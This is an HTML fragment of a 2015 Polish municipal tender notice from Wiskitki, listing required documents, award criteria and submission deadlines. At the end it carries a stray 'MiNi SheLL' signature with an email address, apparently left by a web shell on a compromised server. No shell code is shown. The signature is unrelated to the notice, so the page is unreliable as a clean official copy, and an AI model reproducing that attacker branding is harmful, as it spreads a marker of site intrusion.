<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - doświadczenie wykonawcy w realizacji usług podobnych do przedmiotu zamówienia - ilość wykonanych usług - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiskitki.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiskitki
ul. Kościuszki 1
96-315 Wiskitki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2015 godzina 08:45, miejsce: Sekretariat Urzędu Gminy w Wiskitkach
ul. Kościuszki 1
96-315 Wiskitki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com